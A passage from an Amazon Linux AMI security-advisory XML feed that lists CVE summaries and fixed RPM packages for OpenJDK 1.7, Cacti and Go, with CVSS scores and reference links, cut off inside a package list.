Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21426:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21365:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21360:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21349:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: 2D). Supported versions that are affected are Oracle Java SE: 7u321, 8u311; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21341:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21340:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21305:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21299:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21296:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2022-21294:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21293:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21283:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21282:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2022-21248:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21248" title="" id="CVE-2022-21248" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21282" title="" id="CVE-2022-21282" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21283" title="" id="CVE-2022-21283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21293" title="" id="CVE-2022-21293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21294" title="" id="CVE-2022-21294" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21296" title="" id="CVE-2022-21296" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21299" title="" id="CVE-2022-21299" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21305" title="" id="CVE-2022-21305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21340" title="" id="CVE-2022-21340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21341" title="" id="CVE-2022-21341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21349" title="" id="CVE-2022-21349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21360" title="" id="CVE-2022-21360" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21365" title="" id="CVE-2022-21365" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21426" title="" id="CVE-2022-21426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21434" title="" id="CVE-2022-21434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21443" title="" id="CVE-2022-21443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21476" title="" id="CVE-2022-21476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21496" title="" id="CVE-2022-21496" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21540" title="" id="CVE-2022-21540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21541" title="" id="CVE-2022-21541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34169" title="" id="CVE-2022-34169" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-demo" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.321-2.6.28.1.86.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.321-2.6.28.1.86.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.321-2.6.28.1.86.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.321-2.6.28.1.86.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.321-2.6.28.1.86.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.321-2.6.28.1.86.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.321-2.6.28.1.86.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.321-2.6.28.1.86.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.321-2.6.28.1.86.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.321-2.6.28.1.86.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.321-2.6.28.1.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1634</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1634: critical priority package update for cacti</title><issued date="2022-09-15 03:57:00" /><updated date="2022-09-20 23:20:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0730:
Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0730" title="" id="CVE-2022-0730" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="2.19.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-2.19.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1635</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1635: important priority package update for golang</title><issued date="2022-09-15 03:57:00" /><updated date="2023-11-29 23:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-32148:
Improper exposure of client IP addresses in net/http before Go 1.17.12 and Go 1.18.4 can be triggered by calling httputil.ReverseProxy.ServeHTTP with a Request.Header map containing a nil value for the X-Forwarded-For header, which causes ReverseProxy to set the client IP as the value of the X-Forwarded-For header.
CVE-2022-30635:
A flaw was found in golang. When calling Decoder.Decode on a message that contains deeply nested structures, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.
CVE-2022-30633:
Uncontrolled recursion in Unmarshal in encoding/xml before Go 1.17.12 and Go 1.18.4 allows an attacker to cause a panic due to stack exhaustion via unmarshalling an XML document into a Go struct which has a nested field that uses the any field tag.
CVE-2022-30632:
A flaw was found in golang. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This can cause an attacker to impact availability.
CVE-2022-30631:
A flaw was found in golang. Calling the Reader.Read method on an archive that contains a large number of concatenated 0-length compressed files can cause a panic issue due to stack exhaustion.
CVE-2022-30630:
A flaw was found in the golang standard library, io/fs. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This could allow an attacker to impact availability.
CVE-2022-30629:
Non-random values for ticket_age_add in session tickets in crypto/tls before Go 1.17.11 and Go 1.18.3 allow an attacker that can observe TLS handshakes to correlate successive connections by comparing ticket ages during session resumption.
CVE-2022-29526:
A flaw was found in the syscall.Faccessat function when calling a process by checking the group. This flaw allows an attacker to check the process group permissions rather than a member of the file's group, affecting system availability.
CVE-2022-28327:
An integer overflow flaw was found in Golang's crypto/elliptic library. This flaw allows an attacker to use a crafted scaler input longer than 32 bytes, causing P256().ScalarMult or P256().ScalarBaseMult to panic, leading to a loss of availability.
CVE-2022-28131:
A flaw was found in golang encoding/xml. When calling Decoder.Skip while parsing a deeply nested XML document, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.
CVE-2022-27664:
In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.
CVE-2022-27191:
A broken cryptographic algorithm flaw was found in golang.org/x/crypto/ssh. This issue causes a client to fail authentification with RSA keys to servers that reject signature algorithms based on SHA-2, enabling an attacker to crash the server, resulting in a loss of availability.
CVE-2022-24921:
A stack overflow flaw was found in Golang's regexp module, which can crash the runtime if the application using regexp accepts very long or arbitrarily long regexps from untrusted sources that have sufficient nesting depths. To exploit this vulnerability, an attacker would need to send large regexps with deep nesting to the application. Triggering this flaw leads to a crash of the runtime, which causes a denial of service.
CVE-2022-24675:
A buffer overflow flaw was found in Golang's library encoding/pem. This flaw allows an attacker to use a large PEM input (more than 5 MB) ), causing a stack overflow in Decode, which leads to a loss of availability.
CVE-2022-23806:
A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.
CVE-2022-23773:
cmd/go in Go before 1.16.14 and 1.17.x before 1.17.7 can misinterpret branch names that falsely appear to be version tags. This can lead to incorrect access control if an actor is supposed to be able to create branches but not tags.
CVE-2022-23772:
Rat.SetString in math/big in Go before 1.16.14 and 1.17.x before 1.17.7 has an overflow that can lead to Uncontrolled Memory Consumption.
CVE-2022-1962:
A flaw was found in the golang standard library, go/parser. When calling any Parse functions on the Go source code, which contains deeply nested types or declarations, a panic can occur due to stack exhaustion. This issue allows an attacker to impact system availability.
CVE-2022-1705:
A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating "chunked" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid.
CVE-2021-39293:
A vulnerability was found in archive/zip of the Go standard library. Applications written in Go can panic or potentially exhaust system memory when parsing malformed ZIP files. An attacker capable of submitting a crafted ZIP file to a Go application using archive/zip to process that file could cause a denial of service via memory exhaustion or panic. This particular flaw is an incomplete fix for a previous flaw.
CVE-2021-33196:
A vulnerability was found in archive/zip of the Go standard library. Applications written in Go can panic or potentially exhaust system memory when parsing malformed ZIP files.
CVE-2021-33195:
A flaw was found in Go. The LookupCNAME, LookupSRV, LookupMX, LookupNS, and LookupAddr functions in the net package and methods on the Resolver type, may return arbitrary values retrieved from DNS, allowing injection of unexpected contents. The highest threat from this vulnerability is to integrity.
CVE-2021-27919:
An out of bounds read vulnerability was found in golang. When using the archive/zip standard library (stdlib) and an unexpected file is parsed, it can cause golang to attempt to read outside of a slice (array) causing a panic in the runtime. A potential attacker can use this vulnerability to craft an archive which causes an application using this library to crash resulting in a Denial of Service (DoS).
CVE-2021-27918:
An infinite loop vulnerability was found in golang. If an application defines a custom token parser initializing with `xml.NewTokenDecoder` it is possible for the parsing loop to never return. An attacker could potentially craft a malicious XML document which has an XML element with `EOF` within it, causing the parsing application to endlessly loop, resulting in a Denial of Service (DoS).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27918" title="" id="CVE-2021-27918" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27919" title="" id="CVE-2021-27919" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33195" title="" id="CVE-2021-33195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33196" title="" id="CVE-2021-33196" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39293" title="" id="CVE-2021-39293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705" title="" id="CVE-2022-1705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962" title="" id="CVE-2022-1962" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23772" title="" id="CVE-2022-23772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23773" title="" id="CVE-2022-23773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23806" title="" id="CVE-2022-23806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24675" title="" id="CVE-2022-24675" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24921" title="" id="CVE-2022-24921" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27191" title="" id="CVE-2022-27191" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664" title="" id="CVE-2022-27664" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131" title="" id="CVE-2022-28131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28327" title="" id="CVE-2022-28327" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526" title="" id="CVE-2022-29526" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30629" title="" id="CVE-2022-30629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630" title="" id="CVE-2022-30630" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631" title="" id="CVE-2022-30631" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632" title="" id="CVE-2022-30632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633" title="" id="CVE-2022-30633" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635" title="" id="CVE-2022-30635" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148" title="" id="CVE-2022-32148" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.18.6" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.18.6-1.42.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.18.6-1.42.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.18.6" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.18.6-1.42.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.18.6" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.18.6-1.42.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.18.6" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.18.6-1.42.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.18.6" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.18.6-1.42.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.18.6" release="1.42.amzn1" epoch="0" 